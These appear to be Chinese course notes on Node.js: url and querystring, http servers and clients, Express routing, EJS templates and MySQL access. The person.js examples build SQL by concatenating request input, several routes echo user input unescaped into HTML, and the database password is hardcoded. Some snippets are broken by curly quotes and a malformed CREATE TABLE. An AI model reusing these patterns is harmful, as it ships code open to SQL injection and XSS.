db.query("update person set name='" + name + "',age='" + age + "',professional= '" + professional + "' where id=" + id, function (err, rows) {
if (err) {
res.end('修改失败:' + err);
} else {
res.redirect('/persons');
}
});});
//查询
router.post('/search', function (req, res) {
var name = req.body.s_name;
var age = req.body.s_age;
var professional = req.body.s_professional;
var sql = "select * from person";
if (name) {
sql += " and name like '%" + name + "%' ";
}
if (age) {
sql += " and age=" + age + " ";
}
if (professional) {
sql += " and professional like '%" + professional + "%' ";
}
sql = sql.replace("person and","person where");
db.query(sql, function (err, rows) {
if (err) {
res.end("查询失败:", err)
} else {
res.render("persons", {title: '人员管理', datas: rows});
}
});});
module.exports = router;
persons.ejs
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title><%= title %></title>
<style>
div{width:800px;margin: 0 auto;}
table {border-collapse:collapse;border-spacing:0;width:800px;}
table tr td ,table tr th {border-top:solid 1px #ccc;border-left:solid 1px #ccc;line-height: 40px;text-align: center;}
table tr td:last-child, table tr th:last-child {border-right:solid 1px #ccc;}
table tr:last-child td{border-bottom:solid 1px #ccc;}
a{text-decoration: none;font-size: 14px;}
.text{width:150px;}
</style>
</head>
<body>
<div>
<div style="">
<div style="float: left;width:10%;">
<a href="/persons/add">新增</a>
</div>
<div style="float: right;width:90%;">
<form action="/persons/search" method="post">
姓名:<input type="text" name="s_name" value="" class="text">
年龄:<input type="text" name="s_age" value="" class="text">
职业:<input type="text" name="s_professional" value="" class="text">
<input type="submit" value="查询">
</form>
</div>
</div>
<table style="">
<tr>
<th width="10%">编号</th>
<th width="15%">操作</th>
<th width="15%">姓名</th>
<th width="10%">年龄</th>
<th width="50%">职业</th>
</tr>
<% if (datas.length) { %>
<% datas.forEach(function(person){ %>
<tr>
<td><%= person.id %></td>
<td><a href="/persons/del/<%= person.id %>">删除</a> <a href="/persons/toUpdate/<%= person.id %>">修改</a></td>
<td><%= person.name %></td>
<td><%= person.age %></td>
<td><%= person.professional %></td>
</tr>
<% }) %>
<% } %>
</table>
</div>
</body>
</html>
add.ejs
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>新增页面</title>
</head>
<body>
<div style="width: 800px;margin: auto;">
<form action="/persons/add" method="post">
姓名:<input type="text" name="name">
年龄:<input type="text" name="age">
职业:<input type="text" name="professional">
<input type="submit" value="提交">
</form>
</div>
</body>
</html>
update.ejs
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>修改页面</title>
</head>
<body>
<div style="width: 800px;margin: auto;">
<form action="/persons/update" method="post">
<input type="hidden" value="<%= datas[0].id %>" name="id">
姓名:<input type="text" name="name" value="<%= datas[0].name %>">
年龄:<input type="text" name="age" value="<%= datas[0].age %>">
职业:<input type="text" name="professional" value="<%= datas[0].professional %>">
<input type="submit" value="提交">
</form>
</div>
</body>
</html>
|
__label__pos
| 0.922284 |
[Prev][Next][Index][Thread]
Non-HTML URL Examples
As the use of the URL in XML is being debated, it is
worth noting some relevant facts:
1. The use of the URL in XML is not bounded by the
use of the URL in HTML. It is bounded by the RFCs.
No one disputes this although the argument has
been presented several times that getting to
far beyond HTML's use may impair XML marketability.
That argument may be one of the reasons some
mistakenly believe XML is a replacement for HTML.
In fact, as argued next, XML can only define
the way in which an XML designer expresses the
URL use in the design.
2. XML is a metalanguage. HTML is an application.
This is worth noting because as a metalanguage, an
XML designer might choose to break up or use
a URL in many ways not anticipated by other
application designers. While this makes life
hard for the XML software designer, it it nonetheless
a fact of life for metalanguage applications.
It may impair the interoperability of XML
applications in the same way current SGML
applications do not interoperate, that is, without
a transform, it is meaningless to inline a
TEI document into a MIL-PRF-87269 database.
3. If XML is indeed a metalanguage, it's URL
and link definitions should be capable of
declaring the following VRML examples. Whether this
is *worth* declaring is an application issue.
The point is, in the HyTime or TEI choices,
the winner should be capable of declaring the
following examples.
Here are examples from VRML. First, VRML
defines a URL as a field type. Specifically:
url [ ] is an exposedField of type MFString
An exposedField has an implied eventIn and
eventOut (think of it as an input and output jack)
to connect ROUTEs. There are several exposedFields
in VRML and more can be added by PROTOtypes.
An MF string is a space or comma delimited set
of characters, typically, options.
While the URL itself is defined by the RFC
as has been described in other posts, the
VRML application only cares that it is a string.
This allows the semantics to be applied per
node type. Thus:
Inline { url ["myworld.wrl"] }
where an inline file resembles an SGML
subdoc in that it is an encapsulated namespace.
A defined name is not recognized if instanced
by a USE within the inlining file. A defined
name within the inlining file is not recognized by
an inlined file. The URL within the Inline
can contain multiple URL strings that define a
prioritized list of places to find the URL target.
This list is used to provide a high-to-low
redundant backup (e.g, local disk, local net, WAN, Web)
for each reference.
If a URL is resolved, it returns nodes which are
children of the group parent of the Inline node.
If empty, no action is taken (default). Implementations
can use other rules such as using one URL to read high
priority/high bandwidth, while using a lower priority on a
slower line.
The URL list can be changed using the set_url eventIn
implied by the definition of the URL as an exposedField.
Anchor { url [ ] parameter [ ]
where the URL field is also an exposedField of type MFString
and a prioritized list. It is the parameter field (also, an
exposedField MFString) which contains additional strings
used by the browser when a target page is read. These
fields depend on the browser for functionality. The default
is empty. The #syntax we are used to CAN be appended
to the URL string, but it is restricted to name a Viewpoint
in the target file. As in HTML, using ONLY #viewpoint
is a camera view in the local file. Set_parameter eventIns
are available because it is an exposedField.
Last but most revealing is the following
Script { url "myscript.js"
or
Script { url "javascript:
function set_position(pos, time) {
position = pos;
}
"
field...
eventIn
eventOut
}
where a Script node can use the actual text of the
script as long as the script notation is defined
as shown, eg., javascript: for that language, etc.
VRML does not REQUIRE support for any language.
It only requires that the script be indicated as shown.
These URL examples are provided in contrast to the
use of HTML anchors as examples of common
practice and to note that alternatives are used
in common Internet languages, are learnable,
and are being used everyday.
Len Bullard
Lockheed Martin
C2 Integration Systems
References:
|
__label__pos
| 0.609272 |
Sign up ×
Stack Overflow is a community of 4.7 million programmers, just like you, helping each other. Join them; it only takes a minute:
I've got the UITableView which is populated from NSMutableArray. NSMutableArray was created from my NSFetchedResultsController which came from another view
Templates *template2 = (Templates *)[fetchedResultsController objectAtIndexPath:indexPath];
qModalView.templateObject = template2;
and was recorded to templateObject, so I have got all my objects in this my NSMutablArray that way.
[templateObject.questions allObjects];
Now I want to delete row in my table view , in array and in that particular object in templateObject.questions.
Please help, I have this so far:
- (void)tableView:(UITableView *)tableView commitEditingStyle:(UITableViewCellEditingStyle)editingStyle forRowAtIndexPath:(NSIndexPath *)indexPath
{
Questions *question_var = [questionsArray objectAtIndex:indexPath.row];
NSLog(@"_____________________________%@", question_var.question_title);
NSManagedObjectContext *context = [templateObject managedObjectContext];
[context deleteObject:[templateObject.questions objectAtIndexPath:indexPath]];
NSError *error;
if (![context save:&error]) {
NSLog(@"Unresolved error %@, %@", error, [error userInfo]);
abort();
}else{
NSLog(@"deleted");
}
}
share|improve this question
1 Answer 1
up vote 1 down vote accepted
You can remove the row from the table with
[tableView deleteRowsAtIndexPaths:[NSArray arrayWithObject:indexPath]
withRowAnimation:YES];
and you can delete an object from an NSMutableArray with
[myArray removeObject:myObject];
share|improve this answer
and how do I delete it from the database? Is it happening automatically? – Rouslan Karimov Dec 27 '10 at 17:46
You've already got the database delete, in the lines "[context deleteObject:[templateObject.questions objectAtIndexPath:indexPath]]; " and "[context save:&error]". – Seamus Campbell Dec 27 '10 at 17:51
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.885186 |
Botan 2.17.3
Crypto and TLS for C++11
Public Member Functions | List of all members
Botan::Certificate_Store_In_SQLite Class Referencefinal
#include <certstor_sqlite.h>
Inheritance diagram for Botan::Certificate_Store_In_SQLite:
Botan::Certificate_Store_In_SQL Botan::Certificate_Store
Public Member Functions
void affirm_cert (const X509_Certificate &)
Reverses the revokation for "cert". More...
std::vector< X509_DNall_subjects () const override
bool certificate_known (const X509_Certificate &cert) const
Certificate_Store_In_SQLite (const std::string &db_path, const std::string &passwd, RandomNumberGenerator &rng, const std::string &table_prefix="")
std::vector< std::shared_ptr< const X509_Certificate > > find_all_certs (const X509_DN &subject_dn, const std::vector< uint8_t > &key_id) const override
std::shared_ptr< const X509_Certificatefind_cert (const X509_DN &subject_dn, const std::vector< uint8_t > &key_id) const override
std::shared_ptr< const X509_Certificatefind_cert_by_pubkey_sha1 (const std::vector< uint8_t > &key_hash) const override
std::shared_ptr< const X509_Certificatefind_cert_by_raw_subject_dn_sha256 (const std::vector< uint8_t > &subject_hash) const override
std::vector< std::shared_ptr< const X509_Certificate > > find_certs_for_key (const Private_Key &key) const
Returns all certificates for private key "key". More...
std::shared_ptr< const X509_CRLfind_crl_for (const X509_Certificate &issuer) const override
std::shared_ptr< const Private_Keyfind_key (const X509_Certificate &) const
Returns the private key for "cert" or an empty shared_ptr if none was found. More...
std::vector< X509_CRLgenerate_crls () const
bool insert_cert (const X509_Certificate &cert)
bool insert_key (const X509_Certificate &cert, const Private_Key &key)
bool remove_cert (const X509_Certificate &cert)
void remove_key (const Private_Key &key)
Removes "key" from the store. More...
void revoke_cert (const X509_Certificate &, CRL_Code, const X509_Time &time=X509_Time())
Marks "cert" as revoked starting from "time". More...
Detailed Description
Certificate and private key store backed by an sqlite (https://sqlite.org) database.
Definition at line 18 of file certstor_sqlite.h.
Constructor & Destructor Documentation
◆ Certificate_Store_In_SQLite()
Botan::Certificate_Store_In_SQLite::Certificate_Store_In_SQLite ( const std::string & db_path,
const std::string & passwd,
RandomNumberGenerator rng,
const std::string & table_prefix = ""
)
Create/open a certificate store.
Parameters
db_pathpath to the database file
passwdpassword to encrypt private keys in the database
rngused for encrypting keys
table_prefixoptional prefix for db table names
Definition at line 13 of file certstor_sqlite.cpp.
16 :
17 Certificate_Store_In_SQL(std::make_shared<Sqlite3_Database>(db_path), passwd, rng, table_prefix)
18 {}
Certificate_Store_In_SQL(const std::shared_ptr< SQL_Database > db, const std::string &passwd, RandomNumberGenerator &rng, const std::string &table_prefix="")
Member Function Documentation
◆ affirm_cert()
void Botan::Certificate_Store_In_SQL::affirm_cert ( const X509_Certificate cert)
inherited
Reverses the revokation for "cert".
Definition at line 289 of file certstor_sql.cpp.
References Botan::X509_Certificate::fingerprint().
290 {
291 auto stmt = m_database->new_statement("DELETE FROM " + m_prefix + "revoked WHERE fingerprint == ?1");
292
293 stmt->bind(1,cert.fingerprint("SHA-256"));
294 stmt->spin();
295 }
◆ all_subjects()
std::vector< X509_DN > Botan::Certificate_Store_In_SQL::all_subjects ( ) const
overridevirtualinherited
Returns all subject DNs known to the store instance.
Implements Botan::Certificate_Store.
Definition at line 135 of file certstor_sql.cpp.
References Botan::X509_DN::decode_from().
136 {
137 std::vector<X509_DN> ret;
138 auto stmt = m_database->new_statement("SELECT subject_dn FROM " + m_prefix + "certificates");
139
140 while(stmt->step())
141 {
142 auto blob = stmt->get_blob(0);
143 BER_Decoder dec(blob.first,blob.second);
144 X509_DN dn;
145
146 dn.decode_from(dec);
147
148 ret.push_back(dn);
149 }
150
151 return ret;
152 }
◆ certificate_known()
bool Botan::Certificate_Store::certificate_known ( const X509_Certificate cert) const
inlineinherited
Returns
whether the certificate is known
Parameters
certcertififcate to be searched
Definition at line 72 of file certstor.h.
References Botan::X509_Certificate::subject_dn(), and Botan::X509_Certificate::subject_key_id().
73 {
74 return find_cert(cert.subject_dn(), cert.subject_key_id()) != nullptr;
75 }
virtual std::shared_ptr< const X509_Certificate > find_cert(const X509_DN &subject_dn, const std::vector< uint8_t > &key_id) const
Definition: certstor.cpp:20
◆ find_all_certs()
std::vector< std::shared_ptr< const X509_Certificate > > Botan::Certificate_Store_In_SQL::find_all_certs ( const X509_DN subject_dn,
const std::vector< uint8_t > & key_id
) const
overridevirtualinherited
Find all certificates with a given Subject DN. Subject DN and even the key identifier might not be unique.
Implements Botan::Certificate_Store.
Definition at line 77 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode().
78 {
79 std::vector<std::shared_ptr<const X509_Certificate>> certs;
80
81 std::shared_ptr<SQL_Database::Statement> stmt;
82
83 const std::vector<uint8_t> dn_encoding = subject_dn.BER_encode();
84
85 if(key_id.empty())
86 {
87 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE subject_dn == ?1");
88 stmt->bind(1, dn_encoding);
89 }
90 else
91 {
92 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE\
93 subject_dn == ?1 AND (key_id == NULL OR key_id == ?2)");
94 stmt->bind(1, dn_encoding);
95 stmt->bind(2, key_id);
96 }
97
98 std::shared_ptr<const X509_Certificate> cert;
99 while(stmt->step())
100 {
101 auto blob = stmt->get_blob(0);
102 certs.push_back(std::make_shared<X509_Certificate>(
103 std::vector<uint8_t>(blob.first,blob.first + blob.second)));
104 }
105
106 return certs;
107 }
◆ find_cert()
std::shared_ptr< const X509_Certificate > Botan::Certificate_Store_In_SQL::find_cert ( const X509_DN subject_dn,
const std::vector< uint8_t > & key_id
) const
overridevirtualinherited
Returns the first certificate with matching subject DN and optional key ID.
Reimplemented from Botan::Certificate_Store.
Definition at line 48 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode().
Referenced by Botan::Certificate_Store_In_SQL::remove_cert().
49 {
50 std::shared_ptr<SQL_Database::Statement> stmt;
51
52 const std::vector<uint8_t> dn_encoding = subject_dn.BER_encode();
53
54 if(key_id.empty())
55 {
56 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE subject_dn == ?1 LIMIT 1");
57 stmt->bind(1, dn_encoding);
58 }
59 else
60 {
61 stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE\
62 subject_dn == ?1 AND (key_id == NULL OR key_id == ?2) LIMIT 1");
63 stmt->bind(1, dn_encoding);
64 stmt->bind(2,key_id);
65 }
66
67 while(stmt->step())
68 {
69 auto blob = stmt->get_blob(0);
70 return std::make_shared<X509_Certificate>(std::vector<uint8_t>(blob.first, blob.first + blob.second));
71 }
72
73 return std::shared_ptr<const X509_Certificate>();
74 }
◆ find_cert_by_pubkey_sha1()
std::shared_ptr< const X509_Certificate > Botan::Certificate_Store_In_SQL::find_cert_by_pubkey_sha1 ( const std::vector< uint8_t > & key_hash) const
overridevirtualinherited
Find a certificate by searching for one with a matching SHA-1 hash of public key. Used for OCSP.
Parameters
key_hashSHA-1 hash of the subject's public key
Returns
a matching certificate or nullptr otherwise
Implements Botan::Certificate_Store.
Definition at line 110 of file certstor_sql.cpp.
111 {
112 throw Not_Implemented("Certificate_Store_In_SQL::find_cert_by_pubkey_sha1");
113 }
◆ find_cert_by_raw_subject_dn_sha256()
std::shared_ptr< const X509_Certificate > Botan::Certificate_Store_In_SQL::find_cert_by_raw_subject_dn_sha256 ( const std::vector< uint8_t > & subject_hash) const
overridevirtualinherited
Find a certificate by searching for one with a matching SHA-256 hash of raw subject name. Used for OCSP.
Parameters
subject_hashSHA-256 hash of the subject's raw name
Returns
a matching certificate or nullptr otherwise
Implements Botan::Certificate_Store.
Definition at line 116 of file certstor_sql.cpp.
117 {
118 throw Not_Implemented("Certificate_Store_In_SQL::find_cert_by_raw_subject_dn_sha256");
119 }
◆ find_certs_for_key()
std::vector< std::shared_ptr< const X509_Certificate > > Botan::Certificate_Store_In_SQL::find_certs_for_key ( const Private_Key key) const
inherited
Returns all certificates for private key "key".
Definition at line 213 of file certstor_sql.cpp.
References Botan::Private_Key::fingerprint_private().
214 {
215 auto fpr = key.fingerprint_private("SHA-256");
216 auto stmt = m_database->new_statement("SELECT certificate FROM " + m_prefix + "certificates WHERE priv_fingerprint == ?1");
217
218 stmt->bind(1,fpr);
219
220 std::vector<std::shared_ptr<const X509_Certificate>> certs;
221 while(stmt->step())
222 {
223 auto blob = stmt->get_blob(0);
224 certs.push_back(std::make_shared<X509_Certificate>(
225 std::vector<uint8_t>(blob.first,blob.first + blob.second)));
226 }
227
228 return certs;
229 }
◆ find_crl_for()
std::shared_ptr< const X509_CRL > Botan::Certificate_Store_In_SQL::find_crl_for ( const X509_Certificate issuer) const
overridevirtualinherited
Generates a CRL for all certificates issued by the given issuer.
Reimplemented from Botan::Certificate_Store.
Definition at line 122 of file certstor_sql.cpp.
References Botan::Certificate_Store_In_SQL::generate_crls(), and Botan::X509_Certificate::issuer_dn().
123 {
124 auto all_crls = generate_crls();
125
126 for(auto crl: all_crls)
127 {
128 if(!crl.get_revoked().empty() && crl.issuer_dn() == subject.issuer_dn())
129 return std::shared_ptr<X509_CRL>(new X509_CRL(crl));
130 }
131
132 return std::shared_ptr<X509_CRL>();
133 }
std::vector< X509_CRL > generate_crls() const
◆ find_key()
std::shared_ptr< const Private_Key > Botan::Certificate_Store_In_SQL::find_key ( const X509_Certificate cert) const
inherited
Returns the private key for "cert" or an empty shared_ptr if none was found.
Definition at line 193 of file certstor_sql.cpp.
References Botan::X509_Certificate::fingerprint(), and Botan::PKCS8::load_key().
Referenced by Botan::Certificate_Store_In_SQL::insert_key().
194 {
195 auto stmt = m_database->new_statement("SELECT key FROM " + m_prefix + "keys "
196 "JOIN " + m_prefix + "certificates ON " +
197 m_prefix + "keys.fingerprint == " + m_prefix + "certificates.priv_fingerprint "
198 "WHERE " + m_prefix + "certificates.fingerprint == ?1");
199 stmt->bind(1,cert.fingerprint("SHA-256"));
200
201 std::shared_ptr<const Private_Key> key;
202 while(stmt->step())
203 {
204 auto blob = stmt->get_blob(0);
205 DataSource_Memory src(blob.first,blob.second);
206 key.reset(PKCS8::load_key(src, m_rng, m_password));
207 }
208
209 return key;
210 }
std::unique_ptr< Private_Key > load_key(DataSource &source, std::function< std::string()> get_pass)
Definition: pkcs8.cpp:366
◆ generate_crls()
std::vector< X509_CRL > Botan::Certificate_Store_In_SQL::generate_crls ( ) const
inherited
Generates Certificate Revocation Lists for all certificates marked as revoked. A CRL is returned for each unique issuer DN.
Definition at line 297 of file certstor_sql.cpp.
Referenced by Botan::Certificate_Store_In_SQL::find_crl_for().
298 {
299 auto stmt = m_database->new_statement(
300 "SELECT certificate,reason,time FROM " + m_prefix + "revoked "
301 "JOIN " + m_prefix + "certificates ON " +
302 m_prefix + "certificates.fingerprint == " + m_prefix + "revoked.fingerprint");
303
304 std::map<X509_DN,std::vector<CRL_Entry>> crls;
305 while(stmt->step())
306 {
307 auto blob = stmt->get_blob(0);
308 auto cert = X509_Certificate(
309 std::vector<uint8_t>(blob.first,blob.first + blob.second));
310 auto code = static_cast<CRL_Code>(stmt->get_size_t(1));
311 auto ent = CRL_Entry(cert,code);
312
313 auto i = crls.find(cert.issuer_dn());
314 if(i == crls.end())
315 {
316 crls.insert(std::make_pair(cert.issuer_dn(),std::vector<CRL_Entry>({ent})));
317 }
318 else
319 {
320 i->second.push_back(ent);
321 }
322 }
323
324 std::vector<X509_CRL> ret;
325 X509_Time t(std::chrono::system_clock::now());
326
327 for(auto p: crls)
328 {
329 ret.push_back(X509_CRL(p.first,t,t,p.second));
330 }
331
332 return ret;
333 }
ASN1_Time X509_Time
Definition: asn1_obj.h:386
◆ insert_cert()
bool Botan::Certificate_Store_In_SQL::insert_cert ( const X509_Certificate cert)
inherited
Inserts "cert" into the store, returns false if the certificate is already known and true if insertion was successful.
Definition at line 154 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode(), Botan::X509_Certificate::fingerprint(), Botan::X509_Certificate::subject_dn(), and Botan::X509_Certificate::subject_key_id().
Referenced by Botan::Certificate_Store_In_SQL::insert_key(), and Botan::Certificate_Store_In_SQL::revoke_cert().
155 {
156 const std::vector<uint8_t> dn_encoding = cert.subject_dn().BER_encode();
157 const std::vector<uint8_t> cert_encoding = cert.BER_encode();
158
159 auto stmt = m_database->new_statement("INSERT OR REPLACE INTO " +
160 m_prefix + "certificates (\
161 fingerprint, \
162 subject_dn, \
163 key_id, \
164 priv_fingerprint, \
165 certificate \
166 ) VALUES ( ?1, ?2, ?3, ?4, ?5 )");
167
168 stmt->bind(1,cert.fingerprint("SHA-256"));
169 stmt->bind(2,dn_encoding);
170 stmt->bind(3,cert.subject_key_id());
171 stmt->bind(4,std::vector<uint8_t>());
172 stmt->bind(5,cert_encoding);
173 stmt->spin();
174
175 return true;
176 }
◆ insert_key()
bool Botan::Certificate_Store_In_SQL::insert_key ( const X509_Certificate cert,
const Private_Key key
)
inherited
Inserts "key" for "cert" into the store, returns false if the key is already known and true if insertion was successful.
Definition at line 231 of file certstor_sql.cpp.
References Botan::PKCS8::BER_encode(), Botan::Certificate_Store_In_SQL::find_key(), Botan::X509_Certificate::fingerprint(), Botan::Private_Key::fingerprint_private(), and Botan::Certificate_Store_In_SQL::insert_cert().
231 {
232 insert_cert(cert);
233
234 if(find_key(cert))
235 return false;
236
237 auto pkcs8 = PKCS8::BER_encode(key, m_rng, m_password);
238 auto fpr = key.fingerprint_private("SHA-256");
239
240 auto stmt1 = m_database->new_statement(
241 "INSERT OR REPLACE INTO " + m_prefix + "keys ( fingerprint, key ) VALUES ( ?1, ?2 )");
242
243 stmt1->bind(1,fpr);
244 stmt1->bind(2,pkcs8.data(),pkcs8.size());
245 stmt1->spin();
246
247 auto stmt2 = m_database->new_statement(
248 "UPDATE " + m_prefix + "certificates SET priv_fingerprint = ?1 WHERE fingerprint == ?2");
249
250 stmt2->bind(1,fpr);
251 stmt2->bind(2,cert.fingerprint("SHA-256"));
252 stmt2->spin();
253
254 return true;
255 }
bool insert_cert(const X509_Certificate &cert)
std::shared_ptr< const Private_Key > find_key(const X509_Certificate &) const
Returns the private key for "cert" or an empty shared_ptr if none was found.
secure_vector< uint8_t > BER_encode(const Private_Key &key)
Definition: pkcs8.cpp:139
◆ remove_cert()
bool Botan::Certificate_Store_In_SQL::remove_cert ( const X509_Certificate cert)
inherited
Removes "cert" from the store. Returns false if the certificate could not be found and true if removal was successful.
Definition at line 179 of file certstor_sql.cpp.
References Botan::Certificate_Store_In_SQL::find_cert(), Botan::X509_Certificate::fingerprint(), Botan::X509_Certificate::subject_dn(), and Botan::X509_Certificate::subject_key_id().
180 {
181 if(!find_cert(cert.subject_dn(),cert.subject_key_id()))
182 return false;
183
184 auto stmt = m_database->new_statement("DELETE FROM " + m_prefix + "certificates WHERE fingerprint == ?1");
185
186 stmt->bind(1,cert.fingerprint("SHA-256"));
187 stmt->spin();
188
189 return true;
190 }
std::shared_ptr< const X509_Certificate > find_cert(const X509_DN &subject_dn, const std::vector< uint8_t > &key_id) const override
◆ remove_key()
void Botan::Certificate_Store_In_SQL::remove_key ( const Private_Key key)
inherited
Removes "key" from the store.
Definition at line 257 of file certstor_sql.cpp.
References Botan::Private_Key::fingerprint_private().
258 {
259 auto fpr = key.fingerprint_private("SHA-256");
260 auto stmt = m_database->new_statement("DELETE FROM " + m_prefix + "keys WHERE fingerprint == ?1");
261
262 stmt->bind(1,fpr);
263 stmt->spin();
264 }
◆ revoke_cert()
void Botan::Certificate_Store_In_SQL::revoke_cert ( const X509_Certificate cert,
CRL_Code code,
const X509_Time time = X509_Time()
)
inherited
Marks "cert" as revoked starting from "time".
Definition at line 267 of file certstor_sql.cpp.
References Botan::ASN1_Object::BER_encode(), Botan::X509_Certificate::fingerprint(), Botan::Certificate_Store_In_SQL::insert_cert(), and Botan::ASN1_Time::time_is_set().
268 {
269 insert_cert(cert);
270
271 auto stmt1 = m_database->new_statement(
272 "INSERT OR REPLACE INTO " + m_prefix + "revoked ( fingerprint, reason, time ) VALUES ( ?1, ?2, ?3 )");
273
274 stmt1->bind(1,cert.fingerprint("SHA-256"));
275 stmt1->bind(2,code);
276
277 if(time.time_is_set())
278 {
279 stmt1->bind(3, time.BER_encode());
280 }
281 else
282 {
283 stmt1->bind(3, static_cast<size_t>(-1));
284 }
285
286 stmt1->spin();
287 }
bool insert_cert(const X509_Certificate &cert)
The documentation for this class was generated from the following files:
|
__label__pos
| 0.592603 |
Valhalla basic concepts / terminology
Dan Smith daniel.smith at oracle.com
Tue Jun 9 21:18:21 UTC 2020
I think there remain some finer details of the usage of these terms to be nailed down. Here's an overview of how I think about it. (Please note that I'm talking about the language model here. Exactly how this translates into the JVM model is a separate problem.)
- The *values* of the Java Programming Language are *reference values*—references to objects—and *inline values*—the objects themselves. An *object* is either a *class instance* or an *array*. (See JLS 4.3.1.) All objects can be manipulated via a reference value. Only some objects can also be manipulated directly as inline values.
- A *class* describes the structure of a class instance. A *concrete class* can be *instantiated* (typically via a class instance creation expression). An *inline class* is a concrete class whose instances can be treated as inline values. An *identity class* is a concrete class whose instances support identity-sensitive behaviors, and so must always be handled via references.
- A *type* describes a set of values. An *inline type* consists of inline values, the instances of a particular inline class. A *reference type* consists of references to objects with a particular property, or the null reference. Inline types are disjoint. Reference types have subsetting relationships, captured by the *subtype* relation.
- A *type expression* is the syntax used to refer to a particular type. A class name is one example of a type expression, with a variety of rules used to map this name to specific type. The type expression 'ClassName' often denotes a reference type, but for some inline classes denotes its inline type. The type expression 'ClassName.ref' denotes the reference type of an inline class, and the type expression 'ClassName.val' denotes the inline type of an inline class. (Whether these decorations are allowed redundantly is TBD.)
Where did the primitives go? Primitive values are inline values—specifically, instances of certain inline classes (hopefully the class java.lang.Integer, etc., if we can make the migration work). Primitive types are inline types (e.g., 'int' is shorthand for 'java.lang.Integer.val').
---
A few things that still make me a bit uneasy, maybe could use more noodling:
- "Inline value" vs. "reference value" makes sense. Then re-using "inline" for "inline class" vs. "identity class" is potentially confusing. In this context, we're using "inline" as shorthand for "inline-capable" and "identity-free". It would sort of be nice if we could flip the world and make 'identity' the class declaration keyword (although we'd still need a term for the absence of that keyword).
- The syntax ".val" used to denote an "inline type" is a bit of a mismatch. Maybe we want a new syntax. Or maybe we want to rework the word "value" into the story so that "inline type" becomes "value type".
- The term "class type" now has multiple possible interpretations. I guess, unless it's qualified further, it ought to refer to all types "derived from" a particular class, including reference types, inline types, parameterized types, raw types, ... The taxonomy of types, including appropriate terms, needs to be sorted out.
- I'm ignoring generic inline classes. We're all ignoring generic inline classes. :-) Generics in the inline type world are, I think, a somewhat different beast than generics in the reference type world, because inline types are disjoint. More work to be done here.
More information about the valhalla-spec-observers mailing list
|
__label__pos
| 0.983314 |
16
$\begingroup$
Normally, in the context of pseudo-differential operators, a symbol on a vector bundle $E$ is defined as a smooth function on $E$ which in each trivializing chart fulfills the usual symbol estimates \begin{equation} \sup_{x \in U, \xi \in \mathbb{R}^p} (1 + |\xi|^2)^{\frac{-m + |\beta|}{2}} \ |D^\alpha_x D^\beta_\xi a(x, \xi)| < \infty. \end{equation}
Does there exists a definition which does not directly rely on a local trivialization?
Note that classical symbols (symbols with an asymptotic expansion at infinity) can be interpreted as smooth functions on the (radial) compactification and thus for them there is a nice coordinate-free interpretation (I think this approach is publicized by Richard Melrose). Something along these lines would be perfect, but a definition based on additional data (like choosing a fiber metric and/or connection) is also ok.
$\endgroup$
• 2
$\begingroup$ This is discussed in many places. See e.g. mathoverflow.net/questions/3477/… A possible global definition of a symbol uses jet bundles. Basically, a linear differential operator of order $k$ is a linear bundle map from the $k$-th jet prolongation of $J^kE$ into the target bundle. The symbol is then the associated map from $J^kE / J^{k-1}E \simeq \bigodot^k TM \times E$ to the target bundle. $\endgroup$ – Vít Tuček Aug 27 '14 at 20:11
• 2
$\begingroup$ Thanks Vít Tuček for your comment. Maybe I should have made this clear in the question: I'm not interested in the symbol of a differential operator but of a pseudo-differential operator. These symbols are more generally defined via the above symbol estimates. Furthermore, pseudo-differential operators does not have such a nice interpretation in terms of jet bundles, see for example mathoverflow.net/questions/75976/symbol-of-pseudodiff-operator $\endgroup$ – Tobias Diez Aug 28 '14 at 20:24
• $\begingroup$ I see. In that case I am very interested in answers. :) You can edit your questions and in this case I would even consider adding "pseudodifferential" to the title. $\endgroup$ – Vít Tuček Aug 28 '14 at 20:57
0
$\begingroup$
I think the following should work:
Let $M$ be a compact manifold (just to be safe) and $\pi :E \to M$ a vector bundle. Since $E$ carries an action of $\mathbb{R}^{\times}$ there's an invariant notion of a function on $\overset{\circ}{E}$ ($E$ without the zero section) which is homogeneous of degree $s$ for every $s \in \mathbb{R}$ namely:
$$\{ f: \overset{\circ}{E} \to \mathbb{R} | f(\lambda v) = |\lambda|^s f(v) \}$$
Using this we can define what it means for a function to have growth of degree $\le s$. Namely you just take those functions $f$ on $E$ s.t. $f = O(\psi)$ for some homogeneous function $\psi$ of degree $s$ (where the $O$ notation is supposed to be interpreted fiberwise and not in the $M$-direction).
All that's left now is to take care of derivatives but the vertical subbundle $VE \subset TE$ is always globally well defined (as it is the kernel of the pushforward of tangent vectors). Moreover we can also consider vertical vector fields which are invariant w.r.t. the action of $E$ on itself by vector addition. That is
$$C^{\infty}(E,VE)^E = \{X \in C^{\infty}(E,VE) | \forall u \in C^{\infty}(M,E), t_{\pi^*u}^* X = X\}$$
Where $t_{\pi^*u}^*$ is the pullback along the tranlsation by $\pi^*u$. Call these vertical vector fields linear. In local coordinates these are the vector fields which are constant along the fibers.
Now we can say that a function $f$ on $E$ is of symbol class $\le m$ iff for every collection of $r$ linear vector fields the growth of the iterated derivative w.r.t. these vector fields is of degree $\le m-r$. This definition is obviously local on $M$ and it also recovers your definition in the case of the trivial vector bundle so it must coincide with it in the global case, i hope i'm not wrong...
$\endgroup$
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.94113 |
Home > Blog > SSIS >
Lookup Transformation in SSIS
Rating: 4
25552
1. Share:
SSIS Articles
The Lookup Transformation
